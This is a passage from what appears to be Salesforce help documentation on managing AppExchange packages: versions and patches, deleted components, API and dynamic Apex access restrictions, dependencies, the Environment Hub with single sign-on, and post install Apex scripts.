column lists Previously Released.

Displays the name of the component.Name

If the component was added from a different installed package,
this column lists the name of that package.

Owned By

Displays the name of the parent object a component is
associated with. For example, a custom object is the parent of
a custom field.

Parent Object

Displays the type of the component.Type

Viewing Version History
For package developers, the Versions tab lists all the previous uploads of a package.

Click Push Upgrades to automatically upgrade subscribers to a specific version.

Click the Version Number of any listed uploads to manage that upload. For more information, see Managing Versions on
page 3879.

Note: Push Upgrades is only available for patch updates. Registered Salesforce ISVs may request this feature through
the Salesforce partner portal.

The versions table displays the following package attributes (in alphabetical order):

DescriptionAttribute

Lists the actions you can perform on the package. The possible
actions are:

Action

• Deprecate: Deprecates a package version.

Warning:  Users will no longer be able to
download or install this package. However,
existing installations will continue to work.
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DescriptionAttribute

• Undeprecate: Enables a package version to be installed by
users once again.

The status of the package. The possible statuses are:Status

• Released: The package is Managed - Released.
• Beta: The package is Managed - Beta.
• Deprecated: The package version is deprecated.

The version name for this package version. The version name
is the marketing name for a specific release of a package. It is
more descriptive than the Version Number.

Version Name

The version number for the latest installed package version.
The format is majorNumber.minorNumber.patchNumber,

Version Number

such as 2.1.3. The version number represents a release of a
package. The Version Name is a more descriptive name for
the release. Note that the patchNumber is generated only
when you create a patch. If there is no patchNumber, it is
assumed to be zero (0).

Viewing Patch Development Organizations
Every patch is developed in a patch development organization, which is the organization where patch versions are developed,
maintained, and uploaded. To start developing a patch, you need to create a patch development organization. To do this, see
Creating and Uploading Patches on page 3880. Patch development organizations are necessary to permit developers to make
changes to existing components without causing incompatibilities between existing subscriber installations. Click New to
create a new patch for this package.

The Patch Organizations table lists all the patch development organizations created. It lists the following attributes (in
alphabetical order):

DescriptionAttribute

Lists the actions you can perform on a patch development
organization. The possible actions are:

Action

• Login: Log into your patch development organization.
• Reset: Emails a new temporary password for your patch

development organization.

The login associated with the patch organization.Administrator Username

The package version number that you are patching.Patching Major Release

See Also:
Creating and Editing a Package
Preparing Your Apps for Distribution
Managing Packages
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Determining Your Development Process
Unmanaged packages are available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

Managed packages are available in: Developer Edition

All packages are unmanaged until you convert them to managed packages. This requires managed packages created in a
Developer Edition organization. You may prefer developing managed packages because you can beta test them before a release
and offer upgrades for them.

Before creating a package, determine the development process you aim to take so that you can choose the most appropriate
type of package for your process:

Developing Unmanaged Packages
• Design your app. See the Force.com Quick Reference for Developing Packages.
• Package and upload your app.

Developing Managed Packages
• Design your app. See the Force.com Quick Reference for Developing Packages.
• Package and upload a beta version of your app.
• Gather feedback from your beta testers and make the appropriate fixes to your app.
• Package and upload your final version of the app.

See Also:
Planning the Release of Managed Packages
Deleting Components from Managed Packages
Modifying Custom Fields after a Package is Released
Configuring Default Package Versions for API Calls
About API and Dynamic Apex Access in Packages
Managing API and Dynamic Apex Access in Packages
Generating an Enterprise WSDL with Managed Packages
Understanding Dependencies
Environment Hub
Planning the Release of Managed Packages
Managing Packages
Creating and Uploading Patches

Planning the Release of Managed Packages
Releasing an AppExchange package is similar to releasing any other program in software development. You may want to roll
it out in iterations to ensure each component functions as planned. You may even have beta testers who have offered to install
an early version of your package and provide feedback.
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Once you release a package by publishing it on AppExchange, anyone can install it. So, plan your release carefully. Review
the states defined below to familiarize yourself with the release process. Salesforce automatically applies the appropriate state
to your package and components depending on the upload settings you choose and where it is in the release process.

DescriptionState

The package has not been converted into a managed package or the component
has not been added to a managed package. Note that a component that is “Managed

Unmanaged

- Beta” can become “Unmanaged” if it is removed from a managed package. All
packages are unmanaged unless otherwise indicated by one of the managed icons
below.

The package or component was created in the current Salesforce organization and
is managed, but it is not released because of one of these reasons:

Managed - Beta

• It has not been uploaded.

• It has been uploaded with Managed - Beta option selected. This option
prevents it from being published, publicly available on AppExchange. The
developer can still edit any component but the installer may not be able to
depending on which components were packaged..

The package or component was created in the current Salesforce organization and
is managed. It is also uploaded with the Managed - Released option selected,

Managed - Released

indicating that it can be published on AppExchange and is publicly available. Note
that once you have moved a package to this state, some properties of the components
are no longer editable for both the developer and installer.

This type of release is considered a major release.

If you need to provide a minor upgrade to a managed package, consider creating a
patch instead of a new major release. A patch enables a developer to change the

Patch

functionality of existing components in a managed package, while ensuring that
subscribers experience no visible changes to the package.

This type of release is considered a patch release.

The package or component was installed from another Salesforce organization but
is managed.

Managed - Installed

A developer may decide to refine the functionality in a managed package over time as the requirements evolve. This may
involve redesigning some of the components in the managed package. Developers cannot delete some components in a Managed
- Released package, but they can deprecate a component in a later package version so that new subscribers do not receive the
component, while the component continues to function for existing subscribers and API integrations.

See Also:
Determining Your Development Process
Managing Packages
Determining Your Development Process
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Deleting Components from Managed Packages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange Packages”To delete components from a package:

After you've uploaded a Managed - Released package, you may find that a component needs to be deleted from your
organization. One of the following situations may occur:

• The component, once added to a package, can't be deleted.

Note:  The Available Components table in the Force.com Quick Reference for Developing Packages has more
information on which components can't be deleted.

• The component can be deleted, but can only be undeleted from the Deleted Package Components page.

• The component can be deleted, but can be undeleted from either the Deleted Package Components page or through the
Recycle Bin

To access the Deleted Package Components page, from Setup, click Create > Packages, select the package the component
was uploaded to, then click View Deleted Components. If a component can be retrieved through the Recycle Bin, it can also
be retrieved through this page. You can retrieve the following types of components from here:

• Apex classes and triggers that don't have global access.

• Visualforce components with public access.

• Protected components, including:

◊ Custom labels

◊ Custom links (for Home page only)

◊ Workflow alerts

◊ Workflow field updates

◊ Workflow outbound messages

◊ Workflow tasks

• Data components, such as Documents, Dashboards, and Reports. These are the only types of components that can also
be undeleted from the Recycle Bin.

You can retrieve components from the Recycle Bin and Deleted Package Components page any time before uploading a new
version of the package. To do this, click Undelete next to the component.

After a package is uploaded with a component marked for deletion, it is deleted forever.

Warning:  Although a component is deleted, its Name remains within Salesforce. You can never create another
component with the same name. The Deleted Package Components page lists which names can no longer be used.

The Deleted Components displays the following information (in alphabetical order):
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DescriptionAttribute

If the Managed - Released package hasn't been uploaded
with the component deleted, this contains an Undelete link
that allows you to retrieve the component.

Action

Displays the version number of the package in which a
component exists.

Available in Versions

Displays the name of the component.Name

Displays the name of the parent object a component is
associated with. For example, a custom object is the parent of
a custom field.

Parent Object

Displays the type of the component.Type

See Also:
Determining Your Development Process

Modifying Custom Fields after a Package is Released

Available in: Developer Edition

The following changes are allowed to custom fields in a package, after it is released.

• The length of a text field can be increased or decreased.

• The number of digits to the left or right of the decimal point in a number field can be increased or decreased.

• A required field can be made non-required and vice-versa. If a default value was required for a field, that restriction can
be removed and vice-versa.

See Also:
Determining Your Development Process
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Configuring Default Package Versions for API Calls

Available in: Enterprise, Unlimited, Developer, Editions

User Permissions Needed

“Customize Application”To configure default package versions for API calls:

A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen value
during every major release. The patchNumber is generated and updated only for a patch release. Publishers can use package
versions to evolve the components in their managed packages gracefully by releasing subsequent package versions without
breaking existing customer integrations using the package.

Default package versions for API calls provide fallback settings if package versions are not provided by an API call. Many API
clients do not include package version information, so the default settings maintain existing behavior for these clients.

You can specify the default package versions for enterprise API and partner API calls. The enterprise WSDL is for customers
who want to build an integration with their Salesforce organization only. It is strongly typed, which means that calls operate
on objects and fields with specific data types, such as int and string. The partner WSDL is for customers, partners, and
ISVs who want to build an integration that can work across multiple Salesforce organizations, regardless of their custom objects
or fields. It is loosely typed, which means that calls operate on name-value pairs of field names and values instead of specific
data types.

You must associate the enterprise WSDL with specific package versions to maintain existing behavior for clients. There are
options for setting the package version bindings for an API call from client applications using either the enterprise or partner
WSDL. The package version information for API calls issued from a client application based on the enterprise WSDL is
determined by the first match in the following settings.

1. The PackageVersionHeader SOAP header.
2. The SOAP endpoint contains a URL with a format of serverName/services/Soap/c/api_version/ID where

api_version is the version of the API, such as 28.0, and ID encodes your package version selections when the enterprise
WSDL was generated.

3. The default enterprise package version settings.

The partner WSDL is more flexible as it is used for integration with multiple organizations. If you choose the Not Specified
option for a package version when configuring the default partner package versions, the behavior is defined by the latest
installed package version. This means that behavior of package components, such as an Apex trigger, could change when a
package is upgraded and that change would immediately impact the integration. Subscribers may want to select a specific
version for an installed package for all partner API calls from client applications to ensure that subsequent installations of
package versions do not affect their existing integrations.

The package version information for partner API calls is determined by the first match in the following settings.

1. The PackageVersionHeader SOAP header.
2. An API call from a Visualforce page uses the package versions set for the Visualforce page.
3. The default partner package version settings.

To configure default package versions for API calls:
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1. From Setup, click Develop > API.
2. Click Configure Enterprise Package Version Settings or Configure Partner Package Version Settings. These links are

only available if you have at least one managed package installed in your organization.
3. Select a Package Version for each of your installed managed packages. If you are unsure which package version to

select, you should leave the default selection.
4. Click Save.

Note: Installing a new version of a package in your organization does not affect the current default settings.

See Also:
Determining Your Development Process

About API and Dynamic Apex Access in Packages

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Package components have access via dynamic Apex and the API to standard and custom objects in the organization where
they are installed. Developers of Force.com AppExchange packages that are intended for external customers (also called
third-party developers or partners) may wish to restrict this access. Restricting access makes packages safer for administrators
to install. Also, administrators who install such packages may wish to restrict this access after installation, even if the package
developers have not, for improved security.

API Access is a package setting that controls the dynamic Apex and API access that s-controls and other package components
have to standard and custom objects. The setting displays for both the developer and installer on the package detail page. With
this setting:

• The developer of an AppExchange package can restrict API access for a package before uploading it to Force.com
AppExchange. Once restricted, the package components receive Apex and API sessions that are restricted to the custom
objects in the package. The developer can also enable access to specific standard objects, and any custom objects in other
packages that this package depends on.

• The installer of a package can accept or reject package access privileges when installing the package to his or her organization.

• After installation, an administrator can change Apex and API access for a package at any time. The installer can also enable
access on additional objects such as custom objects created in the installer’s organization or objects installed by unrelated
packages.

There are two possible options for the API Access setting:

• The default Unrestricted, which gives the package components the same API access to standard objects as the user
who is logged in when the component sends a request to the API. Apex runs in system mode. Unrestricted access gives
Apex read access to all standard and custom objects.

• Restricted, which allows the administrator to select which standard objects the components in the package can access.
Further, the components in restricted packages can only access custom objects in the current package if the user has the
object permissions that provide access to them.
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Considerations for API and Dynamic Apex Access in Packages

By default, dynamic Apex can only access the components with which the code is packaged. To provide access to standard
objects not included in the package, the developer must set the API Access.

1. Go to Create > Packages.
2. Select the package that contains a dynamic Apex that needs access to standard objects in the installing organization.
3. In the Package Detail related list, click Enable Restrictions or Restricted, whichever is available.
4. Set the access level (Read, Create, Edit, Delete) for the standard objects that the dynamic Apex can access.
5. Click Save.

Choosing Restricted for the API Access setting in a package affects the following:

• API access in a package overrides the following user permissions:

◊ Author Apex
◊ Customize Application
◊ Edit HTML Templates
◊ Edit Read Only Fields
◊ Manage Billing
◊ Manage Call Centers
◊ Manage Categories
◊ Manage Custom Report Types
◊ Manage Dashboards
◊ Manage Letterheads
◊ Manage Package Licenses
◊ Manage Public Documents
◊ Manage Public List Views
◊ Manage Public Reports
◊ Manage Public Templates
◊ Manage Users
◊ Transfer Record
◊ Use Team Reassignment Wizards
◊ View Setup and Configuration
◊ Weekly Export Data

• If Read, Create, Edit, and Delete access are not selected in the API access setting for objects, users do not have access
to those objects from the package components, even if the user has the “Modify All Data” and “View All Data” permissions.

• Salesforce denies access to Web service and executeanonymous requests from an AppExchange package that has
Restricted access.

The following considerations also apply to API access in packages:

• Workflow rules and Apex triggers fire regardless of API access in a package.
• If a component is in more than one package in an organization, API access is unrestricted for that component in all packages

in the organization regardless of the access setting.
• If Salesforce introduces a new standard object after you select restricted access for a package, access to the new standard

object is not granted by default. You must modify the restricted access setting to include the new standard object.
• When you upgrade a package, changes to the API access are ignored even if the developer specified them. This ensures

that the administrator installing the upgrade has full control. Installers should carefully examine the changes in package
access in each upgrade during installation and note all acceptable changes. Then, because those changes are ignored, the
administrator should manually apply any acceptable changes after installing an upgrade.
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• S-controls are served by Salesforce and rendered inline in Salesforce. Because of this tight integration, there are several
means by which an s-control in an installed package could escalate its privileges to the user’s full privileges. In order to
protect the security of organizations that install packages, s-controls have the following limitations:

◊ For packages you are developing (that is, not installed from AppExchange), you can only add s-controls to packages
with the default Unrestricted API access. Once a package has an s-control, you cannot enable Restricted API
access.

◊ For packages you have installed, you can enable access restrictions even if the package contains s-controls. However,
access restrictions provide only limited protection for s-controls. Salesforce recommends that you understand the
JavaScript in an s-control before relying on access restriction for s-control security.

◊ If an installed package has Restricted API access, upgrades will be successful only if the upgraded version does not
contain any s-controls. If s-controls are present in the upgraded version, you must change the currently installed package
to Unrestricted API access.

See Also:
Determining Your Development Process
Installing a Package
Configuring Installed Packages

Managing API and Dynamic Apex Access in Packages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange packages”To edit API and dynamic Apex access for a package you have
created or installed:

“Download AppExchange packages”To accept or reject package API and dynamic Apex access for
a package as part of installation:

API Access is a package setting that controls the dynamic Apex and API access that s-controls and other package components
have to standard and custom objects. The setting displays for both the developer and installer on the package detail page. With
this setting:

• The developer of an AppExchange package can restrict API access for a package before uploading it to Force.com
AppExchange. Once restricted, the package components receive Apex and API sessions that are restricted to the custom
objects in the package. The developer can also enable access to specific standard objects, and any custom objects in other
packages that this package depends on.

• The installer of a package can accept or reject package access privileges when installing the package to his or her organization.

• After installation, an administrator can change Apex and API access for a package at any time. The installer can also enable
access on additional objects such as custom objects created in the installer’s organization or objects installed by unrelated
packages.
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Setting API and Dynamic Apex Access in Packages

To change package access privileges in a package you or someone in your organization has created:

1. From Setup, click Create > Packages.
2. Select a package.
3. The API Access field displays the current setting, Restricted or Unrestricted, and a link to either Enable

Restrictions or Disable Restrictions. If Read, Create, Edit, and Delete access are not selected in the API access
setting for objects, users do not have access to those objects from the package components, even if the user has the “Modify
All Data” and “View All Data” permissions.

Use the API Access field to:

Enable Restrictions
This option is available only if the current setting is Unrestricted. Select this option if you want to specify the
dynamic Apex and API access that package components have to standard objects in the installer's organization. When
you select this option, the Extended Object Permissions list is displayed. Select the Read, Create, Edit, or Delete
checkboxes to enable access for each object in the list. This selection is disabled in some situations. Click Save when
finished. For more information about choosing the Restricted option, including information about when it is
disabled, see Considerations for API and Dynamic Apex Access in Packages on page 3842.

Disable Restrictions
This option is available only if the current setting is Restricted. Select this option if you do not want to restrict
the Apex and API access privileges that the components in the package have to standard and custom objects. This
option gives all the components in the package the same API access as the user who is logged in. For example, if a
user can access accounts, an Apex class in the package that accesses accounts would succeed when triggered by that
user.

Restricted
Click this link if you have already restricted API access and wish to edit the restrictions.

Accepting or Rejecting API and Dynamic Apex Access Privileges During Installation

To accept or reject the API and dynamic Apex access privileges for a package you are installing:

• Start the installation process on Force.com AppExchange.
• In Approve API Access, either accept by clicking Next, or reject by clicking Cancel. Complete the installation steps if

you have not canceled.

Changing API and Dynamic Apex Access Privileges After Installation

To edit the package API and dynamic Apex access privileges after you have installed a package:

1. From Setup, click Installed Packages.
2. Click the name of the package you wish to edit.
3. The API Access field displays the current setting, Restricted or Unrestricted, and a link to either Enable

Restrictions or Disable Restrictions. If Read, Create, Edit, and Delete access are not selected in the API access
setting for objects, users do not have access to those objects from the package components, even if the user has the “Modify
All Data” and “View All Data” permissions.

Use the API Access field to:

Enable Restrictions
This option is available only if the current setting is Unrestricted. Select this option if you want to specify the
dynamic Apex and API access that package components have to standard objects in the installer's organization. When
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you select this option, the Extended Object Permissions list is displayed. Select the Read, Create, Edit, or Delete
checkboxes to enable access for each object in the list. This selection is disabled in some situations. Click Save when
finished. For more information about choosing the Restricted option, including information about when it is
disabled, see Considerations for API and Dynamic Apex Access in Packages on page 3842.

Disable Restrictions
This option is available only if the current setting is Restricted. Select this option if you do not want to restrict
the Apex and API access privileges that the components in the package have to standard and custom objects. This
option gives all the components in the package the same API access as the user who is logged in. For example, if a
user can access accounts, an Apex class in the package that accesses accounts would succeed when triggered by that
user.

Restricted
Click this link if you have already restricted API access and wish to edit the restrictions.

See Also:
Determining Your Development Process

Generating an Enterprise WSDL with Managed Packages

Available in: Enterprise, Unlimited, and Developer, Editions

User Permissions Needed

“Customize Application”To download a WSDL:

If you are downloading an enterprise WSDL and you have managed packages installed in your organization, you need to take
an extra step to select the version of each installed package to include in the generated WSDL. The enterprise WSDL is
strongly typed, which means that it contains objects and fields with specific data types, such as int and string.

A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen value
during every major release. The patchNumber is generated and updated only for a patch release. Publishers can use package
versions to evolve the components in their managed packages gracefully by releasing subsequent package versions without
breaking existing customer integrations using the package. A subscriber can select a package version for each installed managed
package to allow their API client to continue to function with specific, known behavior even when they install subsequent
versions of a package. Each package version can have variations in the composition of its objects and fields, so you must select
a specific version when you generate the strongly typed WSDL.

To download an enterprise WSDL when you have managed packages installed:

1. From Setup, click Develop > API.
2. Click Generate Enterprise WSDL.
3. Select the Package Version for each of your installed managed packages. If you are unsure which package version to

select, you should leave the default, which is the latest package version.
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4. Click Generate.
5. Use the File menu in your browser to save the WSDL to your computer.
6. On your computer, import the local copy of the WSDL document into your development environment.

Note the following in your generated enterprise WSDL:

• Each of your managed package version selections is included in a comment at the top of the WSDL.

• The generated WSDL contains the objects and fields in your organization, including those available in the selected versions
of each installed package. If a field or object is added in a later package version, you must generate the enterprise WSDL
with that package version to work with the object or field in your API integration.

• The SOAP endpoint at the end of the WSDL contains a URL with a format of
serverName/services/Soap/c/api_version/ID where api_version is the version of the API, such as 28.0, and
ID encodes your package version selections when you communicate with Salesforce.

You can also select the default package versions for the enterprise WSDL without downloading a WSDL at Develop > API
> Generate Enterprise WSDL. Default package versions for API calls provide fallback settings if package versions are not
provided by an API call. Many API clients do not include package version information, so the default settings maintain existing
behavior for these clients.

See Also:
Determining Your Development Process

Understanding Dependencies

AppExchange packages and Visualforce are available in: Group, Professional, Enterprise, Unlimited, and Developer
Editions

Apex available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Upload AppExchange Packages”To upload packages:

“Author Apex”To view Apex dependencies:

“Developer Mode”To view Visualforce dependencies:

Package dependencies are created when one component references another component, permission, or preference that is
required for the component to be valid. Force.com tracks certain dependencies, including:

• Organizational dependencies, such as whether multicurrency or campaigns are enabled

• Component-specific dependencies, such as whether particular record types or divisions exist

• References to both standard and custom objects or fields

Packages, Apex classes, Apex triggers, Visualforce components, and Visualforce pages can have dependencies on components
within an organization. These dependencies are recorded on the Show Dependencies page.
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Dependencies are important for packaging because any dependency in a component of a package is considered a dependency
of the package as a whole.

Note: An installer’s organization must meet all dependency requirements listed on the Show Dependencies page or
else the installation will fail. For example, the installer's organization must have divisions enabled to install a package
that references divisions.

Dependencies are important for Apex classes or triggers because any component on which a class or trigger depends must be
included with the class or trigger when the code is deployed or packaged.

In addition to dependencies, the operational scope is also displayed on the Show Dependencies page. The operational scope is
a table that lists any data manipulation language (DML) operations (such as insert or merge) that Apex executes on a
specified object. The operational scope can be used when installing an application to determine the full extent of the application’s
database operations.

To view the dependencies and operational scope for a package, Apex class, Apex trigger, or Visualforce page:

1. Navigate to the appropriate component from Setup:

• For packages, click Create > Packages.
• For Apex classes, click Develop > Apex Classes.
• For Apex triggers on standard objects, click Customize, click the name of the object, and then click Triggers.
• For Apex triggers on custom objects, click Create, click the name of the object, and then click Triggers.
• For Visualforce pages, click Develop > Pages.

2. Select the name of the component.
3. Click View Dependencies for a package, or Show Dependencies for all other components, to see a list of objects that

depend upon the selected component.

If a list of dependent objects displays, click Fields to access the field-level detail of the operational scope. The field-level detail
includes information, such as whether a field is updated by Apex. For more information, see Field Operational Scope on page
3656.

Packages, Apex code, and Visualforce pages can be dependent on many components, including but not limited to:

• Custom field definitions

• Validation formulas

• Reports

• Record types

• Apex

• Visualforce pages and components
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For example, if a Visualforce page includes a reference to a multicurrency field, such as {!contract.ISO_code}, that
Visualforce page has a dependency on multicurrency. If a package contains this Visualforce page, it also has a dependency on
multicurrency. Any organization that wants to install this package must have multicurrency enabled.

See Also:
Determining Your Development Process
Preparing Your Apps for Distribution
Managing Versions
Publishing Upgrades to Managed Packages
Publishing Extensions to Managed Packages
Field Operational Scope

Environment Hub
Note:  Environment Hub is currently available through a pilot program. For information on enabling it for your
organization, please contact salesforce.com.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Environment Hub”To set up and configure the Environment Hub:

“Connect Organization to Environment Hub”To connect an organization to the Environment Hub:

The Environment Hub lets you view, connect, and access multiple Salesforce organizations from one location. This simplifies
switching between organizations, and can be especially convenient if you use a large number of organizations for business,
development, and testing.

You must choose one organization as the Environment Hub (or hub organization), and can then connect all your other
organizations (or spoke organizations) to the hub. You can establish single sign-on between the hub and spoke organizations,
enabling users to seamlessly navigate between them without having to log into each organization separately.

When you connect an organization to the hub, related organizations are automatically discovered so you don't have to manually
connect them. The following types of related organizations are auto-discovered.

• For a development organization, all its related patch organizations.

• For a Trialforce Management Organization, all Trialforce Source Organizations created from it.

• For a License Management Organization (LMO), that is, an organization with the License Management App (LMA)
installed, any release organization (and therefore all its associated patch organizations) that has a managed package registered
in the LMO.

To access the Environment Hub:

1. In the Force.com App menu, click Environment Hub.
2. Click the Environment Hub tab.
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The Environment Hub main page displays a list of all organizations that are connected to the hub. For each organization, its
name, description, organization ID, single sign-on status, and other details are displayed. From the Environment Hub, you
can perform these actions.

• Click Connect Organization to add another organization.

• Click the name of any organization to view details about it, including other organizations related to it.

• Click Edit next to an organization to update its details.

• Click Del next to an organization to delete it from the Environment Hub.

• Click SSO next to an organization to log in without having to sign in (if single sign-on has been enabled).

• Click Login next to an organization to go to its login page (if single sign-on hasn’t been enabled).

Note:  To find out the hub organization for any spoke organization, from Setup, click Company Profile > Company
Information. The organization ID of the hub organization is listed in the Organization Details section.

See Also:
Determining Your Development Process
Connecting an Organization to the Environment Hub
Viewing Organization Details
Editing Organization Details
Enabling Single Sign-On
Adding a New Linked User to the Environment Hub

Connecting an Organization to the Environment Hub

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Environment Hub”To set up and configure the Environment Hub:

“Connect Organization to Environment Hub”To connect an organization to the Environment Hub:

Note:  Environment Hub is currently available through a pilot program. For information on enabling it for your
organization, please contact salesforce.com.

To access the Environment Hub:

1. In the Force.com App menu, click Environment Hub.
2. Click the Environment Hub tab.

To connect an organization to the Hub:

1. On the Environment Hub main page, click Connect Organization.
2. Enter your username for the organization.
3. Click Connect Organization.
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4. Enter your username and password in the popup window, then click Login.
5. Click Allow in the next popup window.

The organization is now connected to the hub and its detail page displays. From this page, you can:

• Click Edit to provide a meaningful name and description for the organization. This lets you easily identify it in the list of
organizations displayed in the Environment Hub.

• Click Delete to remove the organization from the Environment Hub.

• Click Enable SSO to enable single sign-on between this organization and the Environment Hub. This lets linked users
log into this organization from the Environment Hub without providing credentials.

• Click New SSO User Mapping to add a new linked user, that is, a user who can access both the hub and spoke organizations.

See Also:
Environment Hub

Viewing Organization Details

Note:  Environment Hub is currently available through a pilot program. For information on enabling it for your
organization, please contact salesforce.com.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Environment Hub”To set up and configure the Environment Hub:

“Connect Organization to Environment Hub”To connect an organization to the Environment Hub:

To access the Environment Hub:

1. In the Force.com App menu, click Environment Hub.
2. Click the Environment Hub tab.

Click the name of any organization in the Environment Hub to view details about it, such as its name, description, organization
ID, related organizations, and linked users.

The detail page has the following sections.

• Hub Member Details

• Parent Organizations

• Child Organizations

• Single Sign-On User Mappings

From the Organization Details page, you can do any of the following.

• Click Edit to edit information about this organization.

• Click Delete to remove this organization from the Environment Hub.
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• Click Enable SSO to enable single sign-on for this organization.

Hub Member Details

This section displays the following attributes (in alphabetical order).

DescriptionAttribute

A brief description of this organization.Description

The reason why this page could not be refreshed.Refresh Failure Reason

The method by which this organization was added to the
Environment Hub. Possible values include User Added and
Auto Discovered.

Origin

The name of this organization.Organization

The organization ID of this organization.Organization ID

If single sign-on has been enabled for this organization.
Possible values are:

SSO Status

• On—Single sign-on is enabled.
• Off—Single sign-on is disabled.
• Pending—Single sign-on is in the process of being

enabled.
• Failed—Single sign-on enablement failed. Contact

salesforce.com support for assistance.

Parent Organizations and Child Organizations

When you connect an organization to the Environment Hub, the following types of related organizations are automatically
discovered and connected.

• For a development organization, all its related patch organizations.
• For a Trialforce Management Organization, all Trialforce Source Organizations created from it.
• For a License Management Organization (LMO), that is, an organization with the License Management App (LMA)

installed, any release organization (and therefore all its associated patch organizations) that has a managed package registered
in the LMO.

These sections displays a list of the organizations related to this organization. For each organization in the list, its name and
relationship to this organization are displayed.

Single Sign-On User Mappings

This section displays a list of common users in this organization and the hub organization. Only users who have the same
email address in both organizations are linked. If single sign-on has been enabled for this organization, all linked users can
log into it from the Environment Hub without needing to provide credentials.

From this section, you can do any of the following:

• Click New SSO User Mapping to add a new linked user.
• Click Edit next to any user to edit their information.
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• Click Del next to any user to disable their single sign-on access. To disable single sign-on for multiple users, select them
and then click Del next to any of them.

See Also:
Environment Hub

Editing Organization Details

Note:  Environment Hub is currently available through a pilot program. For information on enabling it for your
organization, please contact salesforce.com.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Environment Hub”To set up and configure the Environment Hub:

“Connect Organization to Environment Hub”To connect an organization to the Environment Hub:

To access the Environment Hub:

1. In the Force.com App menu, click Environment Hub.
2. Click the Environment Hub tab.

To edit details of an organization in the Environment Hub:

1. Click Edit next to that organization’s name in the Environment Hub main page or on its detail page.
2. In the page that displays, edit the name, login credentials, or type for the organization.
3. Click Save.

It’s helpful to provide a meaningful name and description for the organization. This lets you easily identify it in the list of
organizations displayed in the Environment Hub.

See Also:
Environment Hub
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Enabling Single Sign-On

Note:  Environment Hub is currently available through a pilot program. For information on enabling it for your
organization, please contact salesforce.com.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Environment Hub”To set up and configure the Environment Hub:

“Connect Organization to Environment Hub”To connect an organization to the Environment Hub:

To access the Environment Hub:

1. In the Force.com App menu, click Environment Hub.
2. Click the Environment Hub tab.

To enable single sign-on for an organization:

1. On the Environment Hub main page, click the name of the organization.
2. Click Enable SSO on the organization’s detail page.
3. On the page that displays, click Enable SSO.

You’re taken to the detail page of the organization. Its single sign-on status displays both at the top of the page, and next to
the SSO field in the Organization Details section.

See Also:
Environment Hub

Adding a New Linked User to the Environment Hub

Note:  Environment Hub is currently available through a pilot program. For information on enabling it for your
organization, please contact salesforce.com.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Environment Hub”To set up and configure the Environment Hub:

“Connect Organization to Environment Hub”To connect an organization to the Environment Hub:

To access the Environment Hub:
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1. In the Force.com App menu, click Environment Hub.
2. Click the Environment Hub tab.

To add a new linked user to a spoke organization in the Environment Hub:

1. On the Environment Hub, click the name of the organization.
2. Click New in the Linked Users section of that organization’s detail page.
3. In the page that appears, specify that user’s username for both the spoke and hub organizations.
4. Click Save (or Save & New to save and add a new linked user).

Note:  To find out the hub organization for any spoke organization, from Setup, click Company Profile > Company
Information. The organization ID of the hub organization is listed in the Organization Details section.

See Also:
Environment Hub

Resolving Apex Test Failures
Available in: Developer Edition

Package installs or upgrades may fail for not passing Apex test coverage. However, some of these failures can be ignored. For
example, a developer might write an Apex test that makes assumptions about a subscriber's data.

If you're a subscriber whose installation is failing due to an Apex test, contact the developer of the package for help.

If you're a developer and an install fails due to an Apex test failure, check for the following:

• Make sure that you are staging all necessary data required for your Apex test, instead of relying on subscriber data that
exists.

• If a subscriber creates a validation rule, required field, or trigger on an object referenced by your package, your test might
fail if it performs DML on this object. If this object is created only for testing purposes and never at runtime, and the
creation fails due to these conflicts, you might be safe to ignore the error and continue the test. Otherwise, contact the
customer and determine the impact.

Running Apex on Package Install/Upgrade
App developers can specify an Apex script to run automatically after a subscriber installs or upgrades a managed package. This
makes it possible to customize the package install or upgrade, based on details of the subscriber’s organization. For instance,
you can use the script to populate custom settings, create sample data, send an email to the installer, notify an external system,
or kick off a batch operation to populate a new field across a large set of data. For simplicity, you can only specify one post
install script. It must be an Apex class that is a member of the package.

The post install script is invoked after tests have been run, and is subject to default governor limits. It runs as a special system
user that represents your package, so all operations performed by the script appear to be done by your package. You can access
this user by using UserInfo. You will only see this user at runtime, not while running tests.
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If the script fails, the install/upgrade is aborted. Any errors in the script are emailed to the user specified in the Notify on Apex
Error field of the package. If no user is specified, the install/upgrade details will be unavailable.

The post install script has the following additional properties.

• It can initiate batch, scheduled, and future jobs.

• It can’t access Session IDs.

• It can only perform callouts using an async operation. The callout occurs after the script is run and the install is complete
and committed.

Note:  You can’t run a post install script in a new trial organization provisioned using Trialforce. The script only runs
when a subscriber installs your package in an existing organization.

See Also:
How does a Post Install Script Work?
Example of a Post Install Script
Specifying a Post Install Script

How does a Post Install Script Work?
A post install script is an Apex class that implements the InstallHandler interface. This interface has a single method
called onInstall that specifies the actions to be performed on installation.

global interface InstallHandler {
void onInstall(InstallContext context)

}

The onInstall method takes a context object as its argument, which provides the following information.

• The org ID of the organization in which the installation takes place.

• The user ID of the user who initiated the installation.

• The version number of the previously installed package (specified using the Version class). This is always a three-part
number, such as 1.2.0.

• Whether the installation is an upgrade.

• Whether the installation is a push.

The context argument is an object whose type is the InstallContext interface. This interface is automatically implemented
by the system. The following definition of the InstallContext interface shows the methods you can call on the context
argument.

global interface InstallContext {
ID organizationId();
ID installerId();
Boolean isUpgrade();
Boolean isPush();
Version previousVersion();

}

Version Methods and Class
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You can use the methods in the System.Version class to get the version of a managed package and to compare package
versions. A package version is a number that identifies the set of components uploaded in a package. The version number has
the format majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a
